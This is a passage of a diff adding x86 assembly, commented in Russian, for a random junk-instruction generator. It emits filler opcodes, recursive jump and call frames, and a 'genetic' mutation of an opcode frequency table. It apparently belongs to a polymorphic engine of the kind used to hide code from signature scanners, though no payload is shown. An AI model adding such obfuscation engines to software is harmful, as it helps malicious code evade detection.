+		lea	esi,[ebp+__st__]	; В esi кладём смещение 
+						; метки __st__
+		add	eax,esi			; Добавляем смещение 
+						; подпрограммы
+		call	eax			; Вызываем её
+		jmp	__st__			; Переход на __st__
+
+;----[Завершение работы генератора мусора]-------------------------------------;
+
+landing:
+		inc	[ebp+__generation]	; Увеличиваем счётчик поколений
+
+		cmp	[ebp+__generation],10	; Если это не 10 поколение, то
+		jne	__ne__			; идём на выход
+
+		mov	[ebp+__generation],0	; Сбрасываем счётчик поколений
+
+
+		call	gen_mutation		; Вызываем изменение 1 случ.
+						; мат. ожидания
+
+		mov	[ebp+__cross1],ecx	; Выбираем 1 опр. фактор
+						; эволюции
+
+		call	gen_mutation		; Вызываем изменение 2 случ.
+						; мат. ожидания
+
+		mov	[ebp+__cross2],ecx	; Выбираем 2 опр. фактор
+						; эволюции
+__ne__:
+		mov	ecx,[ebp+__cross1]	; Производим селекцию 1 опр.
+		call	gen_crossover		; фактора эволюции
+
+		mov	ecx,[ebp+__cross1]	; Производим селекцию 2 опр.
+		call	gen_crossover		; фактора эволюции
+
+		pop	eax			;
+		pop	ebx			;
+		pop	ebp			;
+		pop	esi			; Восстанавливаем регистры
+		pop	ecx			;
+		pop	edx			;
+
+		ret				; Возврат из подпрограммы
+;----[Подпрограмма выбора стат. вероятностей]----------------------------------;
+
+__freq__:
+		push	eax			; Сохраняем eax в стэке
+
+		lea	esi,[ebp+__freq_table]	; Загружаем указатель на таблицу
+		add	esi,eax			; с мат. ожиданиями
+		lodsw				; Загружаем в ax мат.ожидание
+		mov	edx,eax			; Переносим её в edx
+
+		mov	eax,1001		; Генеририуем случайное число
+		call	brandom32		; в интервале 0..1000
+
+		cmp	edx,eax			; Проверяем попали ли мы?
+		jge	__exit__			; Если попали, то на выход
+		mov	4 ptr [esp],0		; Нет обнулим верхушку стэка
+__exit__:
+		pop	eax			; Восстанавливаем eax из стэка
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма изменения мат. ожидания]------------------------------------;
+
+gen_mutation:
+		mov	eax,21			; Выбираем случайным образом
+		call	brandom32		; вариант генерации мусорных
+						; инструкций
+		shl	eax,1			; Умножаем eax на 2
+
+		lea	esi,[ebp+__freq_table]	; В esi смещение на таблицу
+						; мат. ожиданий опкодов
+		add	esi,eax			; к esi добавляем eax
+		xor	eax,eax			; Обнуляем eax
+		lodsw				; В ax загружаем мат.
+						; ожидание
+
+		call	brandom32		; Генерируем СЧ в диапазоне
+		sub	esi,2			; 0..мат.ожидание-1 и уменьшаем
+						; esi на 2
+		sub	2 ptr [esi],ax		; Вычитаем из мат. ожидания
+						; Наше случаное число
+		push	eax			; Сохраняем в стэке СЧ
+
+		mov	eax,21			; Выбираем случайным образом
+		call	brandom32		; вариант генерации мусорных
+						; инструкций
+		shl	eax,1			; Умножаем eax на 2
+
+		mov	ecx,eax			;
+
+		lea	esi,[ebp+__freq_table]	; В esi смещение на таблицу
+						; мат. ожиданий опкодов
+		add	esi,eax			; к esi добавляем eax
+
+		pop	eax			; Восстанавливаем из стэка СЧ
+		add	2 ptr [esi],ax		; И добавляем его к другому
+						; Мат. ожиданию
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма селекции опр. фактора эволюции]-----------------------------;
+
+gen_crossover:
+
+		mov	eax,21			; Выбираем случайным образом
+		call	brandom32		; вариант генерации мусорных
+						; инструкций
+		shl	eax,1			; Умножаем eax на 2
+
+		lea	esi,[ebp+__freq_table]	; В esi смещение на таблицу
+						; мат. ожиданий опкодов
+		add	esi,eax			; к esi добавляем eax
+		xor	eax,eax			; Обнуляем eax
+		lodsw				; В ax загружаем мат.
+						; ожидание
+
+		call	brandom32		; Генерируем СЧ в диапазоне
+		sub	esi,2			; 0..мат.ожидание-1 и уменьшаем
+						; esi на 2
+		sub	2 ptr [esi],ax		; Вычитаем из мат. ожидания
+						; Наше случаное число
+		push	eax			; Сохраняем в стэке СЧ
+
+		lea	esi,[ebp+__freq_table]	; В esi смещение на таблицу
+						; мат. ожиданий опкодов
+		add	esi,ecx			; к esi добавляем eax
+
+		pop	eax			; Восстанавливаем из стэка СЧ
+		add	2 ptr [esi],ax		; И добавляем его к другому
+						; Мат. ожиданию
+		ret				; Возврат из подпрограммы
+
+
+;----[Генерация инструкций JXX SHORT - 0x70..0x7f]-----------------------------;
+
+__jxx_short:
+		mov	eax,50			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..49
+		push	eax			; Сохраняем eax в стэке
+		add	eax,2			; Добавляем длину перехода
+		cmp	eax,ecx			; Проверяем не больше ли длины
+						; Всех инструкций
+		pop	eax			; Восстанавливаем из стэка eax
+		jle	__gen1__		; Если число превышает длину
+		ret				; то выходим из подпрограммы
+__gen1__:					;
+		push	eax			; Кладём eax опять в стэк
+		mov	eax,10			; Выбираем случайным образом
+		call	brandom32		; число от 0..9
+		add	al,70h			; Добавляем 70h
+		stosb				; и кладём его в буфер
+		pop	eax			; Вынимаем из стэка eax и
+		stosb				; кладём в буфер
+                mov	edx,eax			; Кладём число в edx
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Генерируем рекурсивно
+		call	garbage			; мусор между переходом
+		pop	ecx			; Восстанавливаем ecx
+						; В итоге у нас получается
+						; случайно выбранный,
+						; условный переход:
+						; ..............................
+						; 	jae	next
+						;	mov	eax,0
+						; next:	nop
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		sub	ecx,edx			; И на длину перехода
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций NOT/NEG - 0xf7]-------------------------------------;
+
+__not_r32:
+		cmp	cl,2			; Если длина генерируемой
+		jge	__g1__			; инструкции меньше 2, то
+		ret				; Возврат из подпрограммы
+__g1__:
+		mov	al,0f7h			; Помещаем в al - 0f7h
+		stosb				; и кладём его в буфер
+		mov	dl,0d0h			; Помещаем в dl - 0d0h 
+		mov	eax,2			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..1
+		shl	eax,3			; Умножаем его на 8
+		add	dl,al			; Добавляем к dl - al
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,dl			; Добавляем к al - dl
+		stosb				; и кладём его в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция NOT/NEG:
+						; ..............................
+						; 	not	eax
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций JXX NEAR - 0x0f 0x80..0x0f 0x89]--------------------;
+
+__jxx_near:
+		mov	eax,50			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..49
+		push	eax			; Сохраняем его в стэке
+		add	eax,6			; Добавляем длину перехода
+		cmp	eax,ecx			; Проверяем не больше длины
+						; Всех инструкций
+		pop	eax			; Восстанавливаем eax из стэка
+		jle	__gen2__		; Если число превышает длину
+		ret				; то выходим из подпрограммы
+__gen2__:					;
+		push	eax			; Сохраняем в стэке eax
+		mov	al,0fh			; Помещаем в al - 0fh
+		stosb				; и кладём его в буфер
+		mov	eax,10			; Выбираем случайным образом
+		call	brandom32		; число от 0..9
+						;
+		add	al,80h			; Добавляем 80h
+		stosb				; и кладём его в буфер
+		pop	eax			; Вынимаем из стэка eax
+		stosd				; Помещаем его в буфер
+                mov	edx,eax			; Кладём в edx - eax
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Генерируем рекурсивно
+		call	garbage			; мусор между переходом
+		pop	ecx			; Восстанавливаем ecx
+						; В итоге у нас получается
+						; случайно выбранный,
+						; условный, переход:
+						; ..............................
+						; 	je	next
+						;	push	0
+						; next:	push	64
+						; ..............................
+		sub	ecx,6			; Уменьшаем счётчик на 6
+		sub	ecx,edx			; И на длину инструкций
+						;
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций сопроцессора - 0xdc]--------------------------------;
+
+__x87:
+		cmp	cl,2			; Если длина генерируемой
+		jge	__g2__			; инструкции меньше 2, то
+		ret				; Возврат из подпрограммы
+__g2__:
+		mov	al,0dch			; Кладём в al - 0dch
+		stosb				; И помещаем al в буфер
+		mov	eax,02fh		; Генерируем случайное число
+		call	brandom32		; в интервале 0..2eh
+		add	al,0c0h			; Добавляем к числу 0c0h
+		stosb				; и помещаем сумму в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция сопроцессора:
+						; ..............................
+						; 	fadd	st(0),st
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций сравнения - 0x3a]-----------------------------------;
+
+__cmp_r32_r32:
+		cmp	cl,2			; Если длина генерируемой
+		jge	__g3__			; инструкции меньше 2, то
+		ret				; Возврат из подпрограммы
+__g3__:
+		mov	dl,3ah			; Помещаем в dl - 03ah
+		mov	eax,3			; Получаем случайное число
+		call	brandom32		; в диапазоне 0..2
+		add	al,dl			; Добавляем к al - dl
+		stosb				; Затем помещаем al в буфер
+		call	rnd_reg			; Получаем случайный регистр
+		shl	eax,3			; Умножаем eax на 8
+		add	al,0c0h			; Добавляем к al - 0c0h
+		mov	dl,al			; помещаем в dl - al
+		call	rnd_reg			; Получаем случайный регистр
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция CMP:
+						; ..............................
+						; 	cmp	eax,esp
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций XOR - 0x33]-----------------------------------------;
+
+__xor_r32_r32:
+		cmp	cl,2			; Если длина генерируемой
+		jge	__g4__			; инструкции меньше 2, то
+		ret				; Возврат из подпрограммы
+__g4__:
+		mov	al,33h			; Помещаем в al - 33h
+		stosb				; И затем кладём это в буфер
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		shl	eax,3			; Умножаем eax на 8
+		add	al,0c0h			; Добавляем к al - 0c0h
+		mov	dl,al			; помещаем в dl - al
+		call	rnd_reg			; Получаем случайный регистр
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция XOR:
+						; ..............................
+						; 	xor	eax,esp
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций TEST - 0x84]----------------------------------------;
+
+__test_r32_r32:
+		cmp	cl,2			; Если длина генерируемой
+		jge	__g5__			; инструкции меньше 2, то
+		ret				; Возврат из подпрограммы
+__g5__:
+		mov	dl,084h			; Помещаем в dl - 084h
+		mov	eax,2			; Получаем случайное число
+		call	brandom32		; в диапазоне 0..1
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И затем кладём это в буфер
+		call	rnd_reg			; Вызываем подпрограмму 
+						; получения случайного 
+						; регистра
+		add	al,0c0h			; Добавляем к al - 0c0h
+		mov	dl,al			; помещаем в dl - al
+		call	rnd_reg			; Получаем случайный регистр
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция TEST:
+						; ..............................
+						; 	test	eax,esp
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций MOV, XCHG - 0x87,0x89,0x8b]-------------------------;
+
+__mov_r32_r32:
+		cmp	cl,2			; Если длина генерируемой
+		jge	__g6__			; инструкции меньше 2, то
+		ret				; Возврат из подпрограммы
+__g6__:
+		mov	eax,3			; Генерируем СЧ в 
+		call	brandom32		; диапазоне 0..2
+
+		test	eax,eax			; Проверяем, как опкод мы
+		jnz	__ng1__			; будем генерировать
+						; Если не 0, то 0x8b
+
+		mov	eax,10			; Генерируем СЧ в 
+		call	brandom32		; диапазоне 0..9
+ 
+		test	eax,eax			; Проверяем какой опкод мы
+		jnz	__ng2__			; будем генерировать
+						; Если не 0, то 0x89
+
+		mov	al,87h			; Будем генерировать 0x87
+		jmp	__ag1__			; Идём дальше
+__ng2__:
+		mov	al,89h			; Будем генерировать 0x89
+		jmp	__ag1__			; Идём дальше
+__ng1__:
+		mov	al,8bh			; Помещаем в al - 8bh
+__ag1__:
+		stosb				; Потом помещаем al в буфер
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		shl	eax,3			; Умножаем eax на 8
+		add	al,0c0h			; Добавляем к al - 0c0h
+		mov	dl,al			; помещаем в dl - al
+		call	free_reg		; Получаем случайный регистр
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция MOV, XCHG:
+						; ..............................
+						; 	mov	eax,esp
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций PUSH/POP - 0x50..0x57;0x58..0x5f]-------------------;
+
+__push_r32:
+		mov	eax,10			; Генерируем СЧ в
+		call	brandom32		; диапазоне 0..9
+		mov	edx,eax			; Кладём его в edx
+		add	al,2			; Доавляем к al - 2
+
+		cmp	eax,ecx			; Если длина генерируемой
+		jle	__g7__			; инструкции меньше 2
+						; и длины мусора ,то
+		ret				; Возврат из подпрограммы
+__g7__:
+		call	free_reg		; Получаем случайный регистр
+		add	al,50h			; Добавляем к al - 50h
+		stosb				; Кладём al в буфер
+
+		push	ecx			; Сораняем ecx в стэке
+		mov	ecx,edx			; Генерируем серию
+		call	garbage			; мусорных инструкций
+		pop	ecx			; Вынимаем ecx из стэка
+
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,58h			; Добавляем к al - 58h
+		stosb				; И опять кладём al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции PUSH/POP:
+						; ..............................
+						; 	push	eax
+						;	mov	eax,2
+						; 	pop	ecx
+						; ..............................
+		sub	ecx,edx			; Уменьшаем счётчик на edx
+		sub	ecx,2			; Уменьшаем счётчик на - 2
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций MOV - 0x0b8]----------------------------------------;
+
+__mov_r32_imm32:
+		cmp	cl,5			; Если длина генерируемой
+		jge	__g8__			; инструкции меньше 5, то
+		ret				; Возврат из подпрограммы
+__g8__:						; 
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,0b8h			; Добавляем к al - 0b8h
+		stosb				; И кладём al в буфер
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь eax = 0ffffffffh
+		call	brandom32		; Генерируем случайное
+		stosd				; число
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции MOV:
+						; ..............................
+						; 	mov	eax,12345678
+						; ..............................
+		sub	ecx,5			; Уменьшаем счётчик на 5
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций JMP SHORT - 0xeb]-----------------------------------;
+
+__jmp_short:
+		cmp	cl,2			; Если длина генерируемой 
+		jg	__g9__			; инструкции меньше 2, то
+		ret				; Воврат из подпрограммы
+__g9__:
+		mov	eax,50			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..49
+		push	eax			; Сохраняем его в стэке
+		add	eax,2			; Добавляем длину перехода
+		cmp	eax,ecx			; Проверяем не больше длины
+		pop	eax			; Восстанавливаем из стэка
+		jle	__gen3__		; Если число превышает длину
+		ret				; то выходим из подпрограммы
+__gen3__:					;
+		push	eax			; Сохраняем в стэке eax
+		mov	al,0ebh			; Кладём в al - 0ebh
+		stosb				; И кладём al в буфер
+		pop	eax			; Восстанавливаем из стэка
+		stosb				; Помещаем его в буфер
+                mov	edx,eax			; Кладём в edx - eax
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Генерируем рекурсивно
+		call	garbage			; мусор между переходом
+		pop	ecx			; Восстанавливаем ecx
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции JMP SHORT:
+						; ..............................
+						; 	jmp	next
+						;	mov	ax,22
+						; next:	nop
+						; ..............................
+		sub	ecx,2			; Уменьшаем счётчик на 2
+		sub	ecx,edx			; И на длину инструкций
+						;
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций ADD - 0x81]-----------------------------------------;
+
+__add_r32_imm32:
+		cmp	cl,6			; Если длина генерируемой
+		jge	g10__			; инструкции меньше 6, то
+		ret				; Возврат из подпрограммы
+g10__:
+		mov	al,81h			; Кладём в al - 81h
+		stosb				; И помещаем al в буфер
+		mov	eax,4			; Получаем случайное число
+		call	brandom32		; в диапазоне от 0..9
+		add	al,0ch			; Добавляем к нему - 0ch
+		shl	al,4			; Умножаем al на 16
+		mov	dl,al			; Кладём в dl - al
+		mov	eax,2			; Получаем случайное число
+		call	brandom32		; в диапазоне от 0..1
+		shl	al,3			; Умножаем al на 8
+		add	dl,al			; Добавляем к dl - al
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И кладём al в буфер
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь eax = 0ffffffffh
+		call	brandom32		; Генерируем случайное
+		stosd				; число и кладём его в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции ADD:
+						; ..............................
+						; 	add	eax,12345678
+						; ..............................
+		sub	ecx,6			; Уменьшаем счётчик на 6
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций LEA - 0x8d]-----------------------------------------;
+
+__lea_r32_imm32:
+		cmp	cl,6			; Если длина генерируемой
+		jge	__g11__			; инструкции меньше 6, то
+		ret				; Возврат из подпрограммы
+__g11__:
+		mov	al,8dh			; Кладём в al - 8dh
+		stosb				; И помещаем al в буфер
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		shl	eax,3			; Умножаем eax на - 8
+		add	al,5			; Добавляем к al - 5
+		stosb				; И кладём al в буфер
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь eax = 0ffffffffh
+		call	brandom32		; Генерируем случайное число
+		stosd				; И кладём его в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции LEA:
+						; ..............................
+						; 	lea  eax,[12345678]
+						; ..............................
+		sub	ecx,6			; Уменьшаем счётчик на 6
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций CALL NEAR - 0xe8]-----------------------------------;
+
+__call_near:
+		mov	eax,50			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..49
+		mov	edx,eax			; И кладём его в edx
+
+		mov	eax,50			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..49
+		push	eax			; Сохраняем его в стэке
+		add	eax,11			; Добавляем длину перехода
+		add	eax,edx			; Добавляем к eax - edx
+		cmp	eax,ecx			; Проверяем не больше длины
+		pop	eax			; Восстанавливаем из стэка
+		jle	__gen4__		; Если число превышает длину, то
+		ret				; Возврат из подпрограммы
+__gen4__:                                              
+		push	edx			; Сохраняем в стэке edx
+		push	eax			; Сохраняем в стэке eax
+		mov	al,0e8h			; Кладём в al - 0e8h
+		stosb				; И помещаем al в буфер
+		mov	eax,[esp]		; Восстанавливаем eax
+		inc	eax			; Увеличиваем eax на - 1
+		stosd				; Кладём eax в буфер
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь в eax - 0ffffffffh
+		call	brandom32		; Генерируем СЧ и
+		stosb				; Кладём его в буфер
+		pop	edx			; Вынимаем из стэка в edx
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Генерируем рекурсивно
+		call	garbage			; мусор между переходом
+		pop	ecx			; Восстанавливаем ecx
+
+		mov	al,55h			; 
+		stosb				; Кладём в буфер 055h
+		mov	ax,0ec8bh		; 
+		stosw				; Кладём в буфер 0ec8bh
+
+		push	edx			; Кладём edx в стэк
+
+		mov	edx,[esp+4]		; Вынимаем из стэка в edx
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Генерируем рекурсивно
+		call	garbage			; мусор между переходом
+		pop	ecx			; Восстанавливаем ecx
+
+		mov	al,5dh			; Кладём в буфер 05dh
+		stosb				; 
+
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,58h			; Добавляем к al - 58
+		stosb				; И опять кладём al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция CALL NEAR:
+						; ..............................
+						; 	mov	eax,12345678h
+						; 	call	next
+						; 	add	edx,34567h
+						; next:
+						; 	push	ebp
+						;	mov	ebp,esp
+						; 	xor	eax,edx
+						;	pop	ebp
+						; 	pop	edx
+						; ..............................
+		sub	ecx,11			; Уменьшаем счётчик на 11
+		pop	edx			; Вынимаем из стэка в edx
+		sub	ecx,edx			; Уменьшаем на длину инструкций
+		pop	edx			; Вынимаем из стэка в edx
+		sub	ecx,edx			; Уменьшаем на длину инструкций
+						;
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций SHL - 0xc1]-----------------------------------------;
+
+__shl_r32_imm8:
+		cmp	cl,3			; Если длина генерируемой
+		jge	__g12__			; инструкции меньше 3, то
+		ret				; Возврат из подпрограммы
+__g12__:
+		mov	al,0c1h			; Кладём в al - 0c1h
+		stosb				; И помещаем al в буфер
+		mov	eax,6			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..5
+		shl	eax,3			; Умножаем его на 8
+		add	al,0c0h			; Добавляем к нему - 0c0h
+		mov	dl,al			; Помещаем в dl - al
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+		mov	eax,256			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..255
+		stosb				; И кладём его в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции SHL,ROL, ...:
+						; ..............................
+						; 	shl	ebp,04
+						; ..............................
+		sub	ecx,3			; Уменьшаем счётчик на 3
+		ret				; Возврат из подпрограммы
+
+;----[Генерация иструкций XADD - 0x0f 0x0a3 ...]-------------------------------;
+
+__xadd_r32_r32:
+		cmp	cl,3			; Если длина генерируемой
+		jge	__g13__			; инструкции меньше 6, то
+		ret				; Возврат из подпрограммы
+__g13__:
+		mov	al,0fh			; Кладём в al - 0fh
+		stosb				; И помещаем al в буфер
+		lea	esi,[ebp+__3_byte_opcode]; Кладём в esi указатель на
+						; таблицу частей 3-х байтных
+						; инструкций
+		mov	eax,14			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..13
+		add	esi,eax			; Прибавляем к esi - eax 
+		movsb				; Перемещаем байт в буфер
+		mov	dl,0c0h			; Кладём в dl - 0с0h
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		shl	eax,3			; Умножаем eax на 8
+		add	dl,al			; Добавляем к dl - al
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции XADD,IMUL, ...:
+						; ..............................
+						; 	xadd	eax,eax
+						; ..............................
+		sub	ecx,3			; Уменьшаем счётчик на 3
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций MOV - 0x66 0xb8..0xbf]------------------------------;
+
+__mov_r16_imm16:
+		cmp	cl,4			; Если длина генерируемой
+		jge	__g14__			; инструкции меньше 4, то
+		ret				; Возврат из подпрограммы
+__g14__:
+		mov	al,066h			; Кладём в al - 066h
+		stosb				; И помещаем al в буфер
+		mov	dl,0b8h			; Помещаем в dl - 0b8h
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь в eax - 0ffffffffh
+		call	brandom32		; Генерируем СЧ
+		stosw				; И помещаем его в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции MOV:
+						; ..............................
+						; 	mov	ax,3452
+						; ..............................
+		sub	ecx,4			; Уменьшаем счётчик на 4
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций CMOVA - 0x0f 0x40..0x4f]----------------------------;
+
+__cmova_r32_r32:
+		cmp	cl,3			; Если длина генерируемой
+		jge	__g15__			; инструкции меньше 6, то
+		ret				; Возврат из подпрограммы
+__g15__:
+		mov	al,0fh			; Кладём в al - 0fh
+		stosb				; И помещаем al в буфер
+		mov	eax,15			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..14
+		add	al,40h			; Добавляем к al - 40h
+		stosb				; И помещаем al в буфер
+		call	free_reg		; Берём случайный регистр
+		shl	eax,3			; Умножаем его на 8
+		add	al,0c0h			; Добавляем к нему - 0c0h
+		mov	dl,al			; Помещаем в dl - al
+		call	rnd_reg			; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции CMOVA:
+						; ..............................
+						; cmova        eax,edx
+						; ..............................
+		sub	ecx,3			; Уменьшаем счётчик на 3
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций PUSH/POP - 0x6a, 0x0ff 0x0f0..0x0f7;0x58..0x5f]-----;
+
+__push_r32_2:
+		mov	eax,10			; Генерируем СЧ
+		call	brandom32		; в диапазоне 0..9
+		mov	edx,eax			; Кладём в edx - eax
+		add	al,3			; Добавляем к al - 3
+
+		cmp	eax,ecx			; Если длина генерируемых
+		jle	__g16__			; инструкций меньше ,то
+		ret				; Возврат из подпрограммы
+__g16__:
+		mov	eax,4			; Генерируем СЧ
+		call	brandom32		; в диапазоне 0..3
+		test	eax,eax			; Если оно не равно 0, то
+		jnz	__ng3__			; Переходим на метку __ng3__
+
+		mov	al,6ah			; Кладём в al - 06ah
+		stosb				; Помещаем al в буфер
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь в eax - 0ffffffffh
+		call	brandom32		; Генерируем СЧ
+		stosb				; Кладём в буфер
+		jmp	__gen5__		; Идём на генерацию мусора
+__ng3__:
+		push	edx			; Сохраняем в стэке edx
+
+		mov	al,0ffh			; Кладём в al - 0ffh
+		stosb				; И помещаем al в буфер
+		mov	dl,0f0h			; Кладём в dl - 0f0h
+		call	free_reg		; Получаем свободный регистр 
+		add	al,dl			; Добавляем к al - dl
+		stosb				; И помещаем al в буфер
+
+		pop	edx			; Вынимаем из стэка edx
+__gen5__:
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Кладём в ecx - edx
+		call	garbage			; Генериуем серию мусора
+		pop	ecx			; Восстанавливаем ecx из стэка
+
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,58h			; Добавляем к al - 58h
+		stosb				; И опять кладём al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции PUSH/POP:
+						; ..............................
+						; 	push	eax
+						;	mov	eax,2345
+						; 	pop	ecx
+						; ..............................
+		sub	ecx,edx			; Уменьшаем счётчик на edx
+		sub	ecx,3			; Уменьшаем счётчик на 3
+		ret				; Возврат из подпрограммы
+
+;----[Генерация инструкций PUSH - 0x68,0x58..0x5f]-----------------------------;
+
+__push_imm32:
+		mov	eax,10			; Генерируем СЧ в
+		call	brandom32		; диапазоне 0..9
+		mov	edx,eax			; Помещаем в edx - eax
+		add	al,6			; Добавляем к al - 6
+
+		cmp	eax,ecx			; Если длина генерируемых
+		jle	__g17__			; инструкций меньше, то
+		ret				; Возврат из подпрограммы
+__g17__:
+		mov	al,68h			; Кладём в al - 68h
+		stosb				; Помещаем al в буфер 
+		xor	eax,eax			; Обнуляем eax
+		dec	eax			; Теперь в eax - 0ffffffffh
+		call	brandom32		; Генерируем СЧ
+		stosd				; Кладём его в буфер
+
+		push	ecx			; Сохраняем ecx в стэке
+		mov	ecx,edx			; Кладём в ecx - edx
+		call	garbage			; Генерируем серию мусора
+		pop	ecx			; Восстанавливаем ecx из стэка
+
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,58h			; Добавляем к al - 58h
+		stosb				; И опять кладём al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции PUSH/POP:
+						; ..............................
+						; 	push	eax
+						; 	add	eax,42346
+						; 	pop	ecx
+						; ..............................
+		sub	ecx,edx			; Уменьшаем счётчик на edx
+		sub	ecx,6			; Уменьшаем счётчик на 6
+		ret				; Возврат из подпрограммы
+
+;----[Генерация однобайтовых инструкций - 0x40..0x4f;0x0f2;0x0f3...]-----------;
+
+__one_byte:
+		mov	eax,3			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..2
+		                                   
+		cmp	al,1			; Если число = 1, то 
+		jne	__not_inc_		; генерируем инструкцию INC
+
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,40h			; Добавляем к al - 40h
+		stosb				; Помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции INC:
+						; ..............................
+						; 	inc	eax
+						; 	inc	ebp
+						; ..............................
+		jmp	__q__			; Идём на выход
+__not_inc_:
+
+		cmp	al,2			; Если число = 2, то
+		jne	__not_dec_		; Идём на выход
+
+		call	free_reg		; Вызываем подпрограмму 
+						; получения свободных 
+						; регистров
+		add	al,48h			; Добавляем к al - 48h
+		stosb				; Помещаем al в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкции DEC:
+						; ..............................
+						; dec             eax
+						; ..............................
+		jmp	__q__			; Идём на выход
+__not_dec_:
+
+		lea	esi,[ebp+__1_byte_opcode]; Кладём в esi указатель на
